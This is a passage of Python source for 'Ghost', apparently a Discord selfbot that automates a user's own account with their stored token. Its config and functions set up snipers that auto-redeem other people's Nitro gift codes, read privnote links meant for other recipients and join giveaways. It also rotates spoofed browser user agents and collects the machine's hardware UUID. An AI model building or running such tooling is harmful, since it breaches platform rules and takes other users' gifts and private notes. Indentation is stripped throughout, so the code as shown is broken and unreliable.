of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
import os
from re import T
os.environ['PYGAME_HIDE_SUPPORT_PROMPT'] = "hide"
printSpaces = ""
if os.name == "nt":
os.system("cls")
# os.system("mode 100,25")
os.system("title Ghost")
if os.name == "posix":
os.system("clear")
print(" ")
print(f"{printSpaces}Loading Ghost...")
print(" ")
import sys
import subprocess
import logging
if not os.path.exists('logs/'):
os.makedirs('logs/')
print(printSpaces+"Made logs folder.")
open("logs/info.log", "w").write(" ")
print(printSpaces+"Resetting info log.")
open("logs/warning.log", "w").write(" ")
print(printSpaces+"Resetting warning log.")
open("logs/error.log", "w").write(" ")
print(printSpaces+"Resetting error log.")
open("logs/critical.log", "w").write(" ")
print(printSpaces+"Resetting critical log.")
print(" ")
logging.basicConfig(filename="logs/info.log", level=logging.INFO)
logging.basicConfig(filename="logs/warning.log", level=logging.WARNING)
logging.basicConfig(filename="logs/error.log", level=logging.ERROR)
logging.basicConfig(filename="logs/critical.log", level=logging.CRITICAL)
try:
# pythonVersion = float(str(sys.version_info[0])+"."+str(sys.version_info[1]))
# if pythonVersion < 3.8:
# input("You're not using a supported Python version.")
# exit()
# else:
# print("You're using a supported python version, " + str(pythonVersion))
def install(package):
os.system(f"{sys.executable} -m pip install {package}")
def uninstall(package):
os.system(f"{sys.executable} -m pip uninstall {package}")
if "discord.py" in sys.modules:
uninstall("discord.py")
if "discordselfbot" in sys.modules:
uninstall("discordselfbot")
try:
import discord
except ModuleNotFoundError:
install("discord.py-self")
try:
import pyPrivnote as pn
except ModuleNotFoundError:
install("pyPrivnote")
try:
import names
except ModuleNotFoundError:
install("names")
try:
import simplejson
except ModuleNotFoundError:
install("simplejson")
try:
import aiohttp
except ModuleNotFoundError:
install("aiohttp")
try:
from colour import Color
except ModuleNotFoundError:
install("colour")
try:
from termcolor import colored
except ModuleNotFoundError:
install("termcolor")
try:
from faker import Faker
except ModuleNotFoundError:
install("Faker")
if os.name == "nt":
try:
import plyer
except ModuleNotFoundError:
install("plyer")
try:
from sty import fg, bg, ef, rs, Style, RgbFg
except ModuleNotFoundError:
install("sty==1.0.0rc0")
try:
import colorama
except ModuleNotFoundError:
install("colorama")
try:
import discord_rpc
except ModuleNotFoundError:
install("discord-rpc.py")
try:
import requests
except ModuleNotFoundError:
install("requests")
try:
import uwuify
except ModuleNotFoundError:
install("uwuify")
try:
import numpy as np
except ModuleNotFoundError:
install("numpy")
try:
import discum
except ModuleNotFoundError:
install("discum")
try:
from discord_webhook import DiscordWebhook, DiscordEmbed
except ModuleNotFoundError:
install("discord-webhook")
try:
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
except ModuleNotFoundError:
install("random_user_agent")
try:
import GPUtil
except ModuleNotFoundError:
install("gputil")
try:
import psutil
except ModuleNotFoundError:
install("psutil")
try:
import PIL
except ModuleNotFoundError:
install("pillow")
try:
import pygame
except ModuleNotFoundError:
install("pygame")
# if os.name == "posix":
# if str(subprocess.check_output(["apt-cache", "policy", "libportaudio2"])).split("\\n")[1][2:].split(": ")[1] == "(none)":
# os.system("sudo apt-get install libportaudio2")
try:
import sounddevice
except ModuleNotFoundError:
install("sounddevice")
try:
import discord_emoji
except ModuleNotFoundError:
install("discord-emoji")
if sys.platform == "darwin":
try:
import pync
except ModuleNotFoundError:
install("pync")
if os.name == "nt":
try:
import wmi
except ModuleNotFoundError:
install("WMI")
import wmi
if os.name == "nt":
import plyer
try:
import tkinter
except:
pass
try:
import brainfuckery
except:
install("brainfuckery==1.0.1")
if sys.platform == "darwin":
import pync
import brainfuckery
import colorama
import discord_emoji
import threading
import pygame
import PIL
from random_user_agent.user_agent import UserAgent
from random_user_agent.params import SoftwareName, OperatingSystem
from discord_webhook import DiscordWebhook, DiscordEmbed
import discum
if os.name == "nt":
import winshell
import uwuify
import getpass
import mimetypes
import discord_rpc
from sty import fg, bg, ef, rs, Style, RgbFg
import discord
import json
import pyPrivnote as pn
import random
import asyncio
import requests
import aiohttp
import names
import string
import simplejson
import base64
import math
import time
import urllib
import urllib.request
import codecs
import platform
import psutil
import re
import ctypes
import ctypes.util
import GPUtil
from urllib.request import Request, urlopen
from colour import Color
from discord.ext import commands
from discord.utils import get
from termcolor import colored, cprint
from os.path import dirname, basename, isfile, join
from datetime import datetime, timedelta
import numpy as np
from faker import Faker
def update_config():
configJson = json.load(open("config.json"))
configFile = open("config.json", "r").read()
if ("riskmode" not in configFile):
print(f"{printSpaces}Adding risk mode to config.")
configJson["riskmode"] = bool(False)
if ("load_on_startup" not in configFile):
print(f"{printSpaces}Adding load on startup to config.")
configJson["load_on_startup"] = bool(False)
if ("giveaway_join_delay" not in configFile):
print(f"{printSpaces}Adding giveaway join delay to config.")
configJson["giveaway_join_delay"] = 15
if ("giveaway_sniper_ui" not in configFile):
print(printSpaces+"Adding giveaway sniper ui to config.")
configJson["giveaway_sniper_ui"] = False
if ("snipers" not in configFile):
configJson["snipers"] = {}
print(printSpaces+"Adding nitro sniper to config.")
configJson["snipers"]["nitro"] = bool(True)
print(printSpaces+"Adding privnote sniper to config.")
configJson["snipers"]["privnote"] = bool(True)
print(printSpaces+"Adding giveaway sniper to config.")
configJson["snipers"]["giveaway"] = bool(True)
if ("webhooks" not in configFile):
configJson["webhooks"] = {}
print(printSpaces+"Adding nitro webhook to config.")
configJson["webhooks"]["nitro"] = ""
print(printSpaces+"Adding privnote webhook to config.")
configJson["webhooks"]["privnote"] = ""
print(printSpaces+"Adding giveaway webhook to config.")
configJson["webhooks"]["giveaway"] = ""
if ("motd" not in configFile):
configJson["motd"] = {}
configJson["motd"]["custom"] = bool(False)
print(printSpaces+"Adding custom motd option to config.")
configJson["motd"]["custom_text"] = "Super Cool Custom MOTD"
print(printSpaces+"Adding custom motd text to config.")
if ("selfbot_detect" in configFile):
configJson.pop("selfbot_detect")
print(printSpaces+"Removing selfbot detect from config.")
if ("ghostping_detect" in configFile):
configJson.pop("ghostping_detect")
print(printSpaces+"Removing ghostping detect from config.")
if ("ghostping" not in configJson["webhooks"]):
configJson["webhooks"]["ghostping"] = ""
print(printSpaces+"Adding ghostping webhook to config.")
if ("friendsupdate" not in configJson["webhooks"]):
configJson["webhooks"]["friendsupdate"] = ""
print(printSpaces+"Adding friends update webhook to config.")
if ("dmtyping" not in configJson["webhooks"]):
configJson["webhooks"]["dmtyping"] = ""
print(printSpaces+"Adding DM typing webhook to config.")
if ("guildleave" not in configJson["webhooks"]):
configJson["webhooks"]["guildleave"] = ""
print(printSpaces+"Adding guild leave webhook to config.")
if ("selfbot" not in configJson["webhooks"]):
configJson["webhooks"]["selfbot"] = ""
print(printSpaces+"Adding selfbot webhook to config.")
if ("tickets" not in configJson["webhooks"]):
configJson["webhooks"]["tickets"] = ""
print(printSpaces+"Adding tickets webhook to config.")
if ("sounds" not in configFile):
configJson["sounds"] = bool(True)
print(printSpaces+"Adding sounds toggle to config.")
if ("detections" not in configFile):
configJson["detections"] = {}
configJson["detections"]["selfbot"] = bool(True)
print(printSpaces+"Adding selfbot detection to config.")
configJson["detections"]["ghostping"] = bool(True)
print(printSpaces+"Adding ghostping detection to config.")
configJson["detections"]["bans"] = bool(True)
print(printSpaces+"Adding ban detection to config.")
if ("deletedmessages" not in configJson["detections"]):
configJson["detections"]["deletedmessages"] = bool(False)
print(printSpaces+"Adding deleted messages detection to config.")
if ("webhookmodification" not in configJson["detections"]):
configJson["detections"]["webhookmodification"] = bool(True)
print(printSpaces+"Adding webhook modification detection to config.")
if ("friendsupdate" not in configJson["detections"]):
configJson["detections"]["friendsupdate"] = bool(True)
print(printSpaces+"Adding friends update detection to config.")
if ("dmtyping" not in configJson["detections"]):
configJson["detections"]["dmtyping"] = bool(True)
print(printSpaces+"Adding DM typing detection to config.")
if ("guildleave" not in configJson["detections"]):
configJson["detections"]["guildleave"] = bool(True)
print(printSpaces+"Adding guild leave detection to config.")
if ("embed_mode" not in configFile):
configJson["embed_mode"] = bool(False)
print(printSpaces+"Adding embed mode to config.")
if ("ignored_servers" not in configFile):
configJson["ignored_servers"] = {}
configJson["ignored_servers"]["nitro"] = []
print(printSpaces+"Adding nitro ignored servers to config.")
configJson["ignored_servers"]["privnote"] = []
print(printSpaces+"Adding privnote ignored servers to config.")
configJson["ignored_servers"]["giveaways"] = []
print(printSpaces+"Adding giveaways ignored servers to config.")
configJson["ignored_servers"]["ghostpings"] = []
print(printSpaces+"Adding ghostpings ignored servers to config.")
configJson["ignored_servers"]["selfbots"] = []
print(printSpaces+"Adding selfbots ignored servers to config.")
configJson["ignored_servers"]["bans"] = []
print(printSpaces+"Adding bans ignored servers to config.")
configJson["ignored_servers"]["deletedmessages"] = []
print(printSpaces+"Adding deletedmessages ignored servers to config.")
if ("webhookmodifications" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["webhookmodifications"] = []
print(printSpaces+"Adding webhook modification ignored servers to config.")
if ("tickets" not in configJson["snipers"]):
configJson["snipers"]["tickets"] = bool(True)
print(printSpaces+"Adding ticket sniper to config.")
if ("tickets" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["tickets"] = []
print(printSpaces+"Adding tickets ignored servers to config.")
if ("guildleave" not in configJson["ignored_servers"]):
configJson["ignored_servers"]["guildleave"] = []
print(printSpaces+"Adding guild leave ignored servers to config.")
if ("api_keys" not in configFile):
print(printSpaces+"Adding api keys to config.")
configJson["api_keys"] = {}
configJson["api_keys"]["hypixel"] = ""
configJson["api_keys"]["tenor"] = ""
if ("afkmode" not in configFile):
print(printSpaces+"Adding afkmode to config.")
configJson["afkmode"] = {}
configJson["afkmode"]["enabled"] = False
configJson["afkmode"]["replymessage"] = "im currently afk :/"
if ("toastnotifications" not in configFile):
print(printSpaces+"Adding toast notifications to config.")
configJson["toastnotifications"] = True
json.dump(configJson, open("config.json", "w"), sort_keys=False, indent=4)
configJson = json.load(open("config.json"))
configFile = open("config.json", "r").read()
if ("load_on_startup" in configFile):
configJson.pop("load_on_startup")
print(printSpaces+"Removing load on startup from config.")
json.dump(configJson, open("config.json", "w"), sort_keys=False, indent=4)
if not os.path.exists('pytoexe/'): os.makedirs('pytoexe/');
if not os.path.exists('privnote-saves/'): os.makedirs('privnote-saves/');
if not os.path.exists('scripts/'): os.makedirs('scripts/');
if not os.path.exists('data/'): os.makedirs('data/');
if not os.path.exists('themes/'): os.makedirs('themes/');
if not os.path.exists('sounds/'): os.makedirs('sounds/');
if not os.path.isfile("data/icon.png"): open("data/icon.png", "wb").write(requests.get("https://raw.githubusercontent.com/GhostSelfbot/Branding/main/ghost.png", allow_redirects=True).content)
# if not os.path.isfile('icon.ico'): open('icon.ico', 'wb').write(requests.get('https://ghost.cool/favicon.ico', allow_redirects=True).content);
# if not os.path.isfile('sounds/connected.mp3'): open('sounds/connected.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/connected.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/error.mp3'): open('sounds/error.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/error.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/notification.mp3'): open('sounds/notification.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/notification.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/success.mp3'): open('sounds/success.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/success.mp3', allow_redirects=True).content);
# if not os.path.isfile('sounds/giveaway-win.mp3'): open('sounds/giveaway-win.mp3', 'wb').write(requests.get('https://ghost.cool/assets/sounds/giveaway-win.mp3', allow_redirects=True).content);
# if not os.path.exists('trump-tweets/'): os.makedirs('trump-tweets/');
# if not os.path.exists('trump-tweets/assets'): os.makedirs('trump-tweets/assets');
# if not os.path.isfile('trump-tweets/assets/bg.png'):
# dtrumpbg = 'https://bennyware.xyz/files/dtrumptweetbg.png'
# dtrumpbg_r = requests.get(dtrumpbg, allow_redirects=True)
# open('trump-tweets/assets/bg.png', 'wb').write(dtrumpbg_r.content)
# if not os.path.isfile('trump-tweets/assets/roboto.ttf'):
# font = 'https://bennyware.xyz/files/roboto.ttf'
# font_r = requests.get(font, allow_redirects=True)
# open('trump-tweets/assets/roboto.ttf', 'wb').write(font_r.content)
# open('data/icon.png', 'wb').write(requests.get('http://ghost.cool/assets/icon.png', allow_redirects=True).content)
if not os.path.isfile('config.json'):
f = open('config.json', "w")
f.write("""
{
"token": "",
"prefix": ".",
"delete_timeout": 15,
"theme": "Ghost"
}
""")
f.close()
if not os.path.isfile('giveawaybots.json'):
f = codecs.open('giveawaybots.json', "w", encoding="UTF-8")
f.write("""
{
"294882584201003009": "🎉",
"396464677032427530": "🎉",
"720351927581278219": "🎉",
"582537632991543307": "🎉"
}
""")
f.close()
if not os.path.isfile('customcommands.json'):
f = open('customcommands.json', "w")
f.write("""
{
"cmd1": "this is cmd1",
"cmd2": "this is cmd2"
}
""")
f.close()
if not os.path.isfile('richpresence.json'):
f = open('richpresence.json', 'w')
f.write("""
{
"enabled": true,
"client_id": 807369019744059403,
"details": "Using Ghost selfbot...",
"state": "",
"large_image_key": "icon",
"large_image_text": "ghost.cool"
}
""")
f.close()
if os.path.isfile("richpresence.json"):
jsonFile = json.load(open("richpresence.json"))
if jsonFile["client_id"] == 807369019744059403:
jsonFile["client_id"] = 877223591828136006
if jsonFile["details"] == "Using Ghost selfbot...":
jsonFile["details"] = "Using Ghost..."
if "small_image_key" not in jsonFile:
jsonFile["small_image_key"] = "small"
if "small_image_text" not in jsonFile:
jsonFile["small_image_text"] = "best sb for £2"
json.dump(jsonFile, open("richpresence.json", "w"), sort_keys=False, indent=4)
if not os.path.isfile('themes/Ghost.json'):
f = open('themes/Ghost.json', "w")
f.write("""
{
"embedtitle": "Ghost",
"embedcolour": "#3B79FF",
"consolecolour": "#3B79FF",
"embedfooter": "ghost.cool",
"embedfooterimage": "https://ghost.cool/assets/icon.gif",
"globalemoji": ":blue_heart:",
"embedimage": "https://ghost.cool/assets/icon.gif"
}
""")
f.close()
if not os.path.isfile('data/personal-pins.json'):
f = open('data/personal-pins.json', "w")
f.write("{}")
f.close()
if not os.path.isfile('data/tokens.txt'):
f = open('data/tokens.txt', "w")
f.close()
if not os.path.isfile('data/rickroll.txt'):
f = open('data/rickroll.txt', "w")
f.write("""We're no strangers to love
You know the rules and so do I
A full commitment's what I'm thinking of
You wouldn't get this from any other guy
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
And if you ask me how I'm feeling
Don't tell me you're too blind to see
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give, never gonna give
(Give you up)
(Ooh) Never gonna give, never gonna give
(Give you up)
We've known each other for so long
Your heart's been aching but you're too shy to say it
Inside we both know what's been going on
We know the game and we're gonna play it
I just wanna tell you how I'm feeling
Gotta make you understand
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt you
Never gonna give you up
Never gonna let you down
Never gonna run around and desert you
Never gonna make you cry
Never gonna say goodbye
Never gonna tell a lie and hurt...""")
f.close()
if not os.path.isfile("scripts/consolecommand-example.py"):
f = open("scripts/consolecommand-example.py", "w")
f.write("""
@Ghost.command(name="consolecommand", description="console command test", usage="consoletest", aliases=["consoleCommand-consoletest"])
async def consoletest(ctx):
print("This is a command that can be executed in the console.")
print("You can create this commands by adding consoleCommand-{commandname} in the commands aliases.")
print("")
print("Any command that has that in the aliases will be able to be executed in the console and in discord so prints will be better.")
print("FYI: Arguments currently are not possible.")
""")
f.close()
if not os.path.isfile('scripts/example.py'):
f = open('scripts/example.py', "w")
f.write('''
@Ghost.command(name="example", description="Example custom script.", usage="example")
async def example(Ghost):
exampleEmbed = discord.Embed(
title="Example Embed",
description="""
An example embed to display what you can do in scripts.
Check `scripts/example.py` to see the code!
** **
Ghost scripts are all created in python using discord.py so you can use any feature from discord.py.
""",
color=__embedcolour__
)
exampleEmbed.add_field(name="Variables", value="""
**\_\_embedtitle\_\_** : Theme's embed title.
**\_\_embedcolour\_\_** : Theme's embed colour.
**\_\_embedfooter\_\_** : Theme's embed footer.
**\_\_embedimage\_\_** : Theme's embed image url.
**\_\_embedfooterimage\_\_** : Theme's embed footer image url.
**\_\_embedemoji\_\_** : Theme's global emoji.
**\_\_deletetimeout\_\_** : Config delete timeout (seconds).
""")
exampleEmbed.set_thumbnail(url=__embedimage__)
exampleEmbed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
await Ghost.send("Hello World!", embed=exampleEmbed)
''')
f.close()
if json.load(open("config.json"))["token"] == "":
os.system("cls")
os.system("clear")
print("")
print("Please input your Discord token below.".center(os.get_terminal_size().columns))
print("")
token = input()
config = json.load(open("config.json"))
config["token"] = (token)
json.dump(config, open('config.json', 'w'), sort_keys=False, indent=4)
ccmd_file = open('customcommands.json')
ccmd = json.load(ccmd_file)
def updateTheme(theme):
themeJson = json.load(open(f"themes/{theme}"))
if "consolecolour" not in themeJson:
themeJson["consolecolour"] = "#3B79FF"
if "consolemode" not in themeJson:
themeJson["consolemode"] = "new"
if "embedlargeimage" not in themeJson:
themeJson["embedlargeimage"] = ""
json.dump(themeJson, open(f"themes/{theme}", "w"), sort_keys=False, indent=4)
for theme in os.listdir("themes"):
if theme.endswith(".json"):
updateTheme(theme)
update_config()
CONFIG = json.load(open("config.json"))
GIVEAWAYBOTS = json.load(codecs.open("giveawaybots.json", encoding="UTF-8"))
__token__ = CONFIG["token"]
__prefix__ = CONFIG["prefix"]
# __loadonstartup__ = CONFIG["load_on_startup"]
__deletetimeout__ = CONFIG["delete_timeout"]
__theme__ = CONFIG["theme"]
__sounds__ = CONFIG["sounds"]
__riskmode__ = CONFIG["riskmode"]
__nitrosniper__ = CONFIG["snipers"]["nitro"]
__privnotesniper__ = CONFIG["snipers"]["privnote"]
__giveawaysniper__ = CONFIG["snipers"]["giveaway"]
__giveawaysniperui__ = CONFIG["giveaway_sniper_ui"]
__ticketsniper__ = CONFIG["snipers"]["tickets"]
__nitrowebhook__ = CONFIG["webhooks"]["nitro"]
__privnotewebhook__ = CONFIG["webhooks"]["privnote"]
__giveawaywebhook__ = CONFIG["webhooks"]["giveaway"]
__ghostpingwebhook__ = CONFIG["webhooks"]["ghostping"]
__friendsupdatewebhook__ = CONFIG["webhooks"]["friendsupdate"]
__dmtypingwebhook__ = CONFIG["webhooks"]["dmtyping"]
__guildleavewebhook__ = CONFIG["webhooks"]["guildleave"]
__selfbotwebhook__ = CONFIG["webhooks"]["selfbot"]
__ticketswebhook__ = CONFIG["webhooks"]["tickets"]
__giveawayjoindelay__ = CONFIG["giveaway_join_delay"]
__custommotd__ = CONFIG["motd"]["custom"]
__custommotdtext__ = CONFIG["motd"]["custom_text"]
__selfbotdetect__ = CONFIG["detections"]["selfbot"]
__ghostpingdetect__ = CONFIG["detections"]["ghostping"]
__bandetect__ = CONFIG["detections"]["bans"]
__deletedmessagesdetect__ = CONFIG["detections"]["deletedmessages"]
__webhookmodificationdetect__ = CONFIG["detections"]["webhookmodification"]
__friendsupdatedetect__ = CONFIG["detections"]["friendsupdate"]
__dmtypingdetect__ = CONFIG["detections"]["dmtyping"]
__guildleavedetect__ = CONFIG["detections"]["guildleave"]
THEME = json.load(open(f"themes/{__theme__}.json"))
__embedtitle__ = THEME["embedtitle"]
__embedcolour__ = int(THEME["embedcolour"].replace('#', '0x'), 0)
__embedcolourraw__ = THEME["embedcolour"]
__embedfooter__ = THEME["embedfooter"]
__embedemoji__ = THEME["globalemoji"]
__embedimage__ = THEME["embedimage"]
__embedlargeimage__ = THEME["embedlargeimage"]
__embedfooterimage__ = THEME["embedfooterimage"]
__embedmode__ = ""
__consolemode__ = THEME["consolemode"]
__ignoredservers__ = CONFIG["ignored_servers"]
__consolecolour__ = THEME["consolecolour"]
__ghostloaded__ = False
__guildleaveignoredservers__ = CONFIG["ignored_servers"]["guildleave"]
nsfwTypes = ["boobs", "ass", "hentai", "porngif", "pussy", "tits", "tittydrop", "tittypop", "titty", "femboy"]
typinghistory = {}
now = datetime.now()
fake = Faker()
def getCurrentTime():
return datetime.now().strftime("%H:%M:%S")
def print_important(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cPurple}[IMPORTANT] {fg.cWhite}{message}")
def print_info(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cYellow}[INFORMATION] {fg.cWhite}{message}")
def print_cmd(command):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[COMMAND] {fg.cWhite}{command}")
def print_sharecmd(author, command):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.consoleColour}[SHARE COMMAND] {fg.cWhite}({author}) {command}")
def print_error(error):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[ERROR] {fg.cWhite}{error}")
def print_detect(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cPink}[DETECT] {fg.cWhite}{message}")
def print_sniper(message):
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cOrange}[SNIPER] {fg.cWhite}{message}")
def print_sniper_info(firstmessage, secondmessage):
spaces = ""
# for i in range(len(f"[{getCurrentTime()}]")):
# spaces += " "
print(f"{printSpaces}{spaces} {fg.cYellow}{firstmessage}: {fg.cGrey}{secondmessage}")
def is_me(m):
return m.author == Ghost.user
def restart_bot():
python = sys.executable
os.execl(python, python, * sys.argv)
def close_bot():
os.system("taskkill /IM Ghost.exe")
def is_windows():
return os.name == "nt"
def is_linux():
return os.name == "posix"
def GetUUID():
if is_windows():
cmd = 'wmic csproduct get uuid'
uuid = str(subprocess.check_output(cmd))
pos1 = uuid.find("\\n")+2
uuid = uuid[pos1:-15]
elif is_linux():
uuid = str(subprocess.Popen(["dmidecode", "-s", "system-uuid"], stdout=subprocess.PIPE).communicate()[0]).replace("b'", "").replace("\\n'", "")
return uuid
# Found: https://stackoverflow.com/a/64676639
def hex_to_rgb(hex_string):
r_hex = hex_string[1:3]
g_hex = hex_string[3:5]
b_hex = hex_string[5:7]
red = int(r_hex, 16)
green = int(g_hex, 16)
blue = int(b_hex, 16)
return red, green, blue
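    # Illustrative check (not part of the original script): hex_to_rgb("#3B79FF")
    # returns (59, 121, 255), i.e. the default theme colour as an RGB tuple.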
def get_nsfw(type):
types = nsfwTypes
if type not in types:
return "Invalid type."
else:
for type2 in types:
if type == type2:
request = requests.get(f"https://www.reddit.com/r/{type2}/random.json", headers={'User-agent': get_random_user_agent()}).json()
url = request[0]["data"]["children"][0]["data"]["url"]
if "redgifs" in str(url):
url = request[0]["data"]["children"][0]["data"]["preview"]["reddit_video_preview"]["fallback_url"]
return url
def get_nsfw_custom_type(type):
request = requests.get(f"https://www.reddit.com/r/{type}/random.json", headers={'User-agent': get_random_user_agent()}).json()
url = request[0]["data"]["children"][0]["data"]["url"]
if "redgifs" in str(url):
url = request[0]["data"]["children"][0]["data"]["preview"]["reddit_video_preview"]["fallback_url"]
return url
def send_notification(title, message, duration):
if CONFIG["toastnotifications"]:
if sys.platform == "win32":
plyer.notification.notify(
title=title,
message=message,
app_name="Ghost",
app_icon="icon.ico",
timeout=duration,
toast=True
)
elif sys.platform == "darwin":
pync.notify(message, title=title)
def claim_nitro(code, userToken):
URL = f'https://discordapp.com/api/v6/entitlements/gift-codes/{code}/redeem'
result = requests.post(URL, headers={'Authorization': userToken}).text
if 'nitro' in result:
return "Valid Code"
else:
return "Invalid Code"
def read_privnote(url):
content = pn.read_note(link=url)
return content
def get_random_user_agent():
userAgents = ["Mozilla/5.0 (Windows NT 6.2;en-US) AppleWebKit/537.32.36 (KHTML, live Gecko) Chrome/56.0.3075.83 Safari/537.32", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 8.0; WOW64) AppleWebKit/536.24 (KHTML, like Gecko) Chrome/32.0.2019.89 Safari/536.24", "Mozilla/5.0 (Windows NT 5.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.41 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3058.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2599.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.139 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3258.0 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/6.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/38.0.2125.101 Safari/537.1", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2151.2 Safari/537.36", "Mozilla/5.0 (Windows NT 5.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36", "Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1204.0 Safari/537.1", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) HeadlessChrome/67.0.3387.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.0.9757 Safari/537.36", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.81 Safari/537.36", "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3251.0 Safari/537.36", "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/538 (KHTML, like Gecko) Chrome/36 Safari/538", "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.18 Safari/535.1", "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/5.0.355.0 Safari/533.3", "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.4 Safari/532.0", "Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.35 (KHTML, like Gecko) Chrome/27.0.1453.0 Safari/537.35", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3359.181 Safari/537.36", "Mozilla/5.0 (Windows NT 10.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 
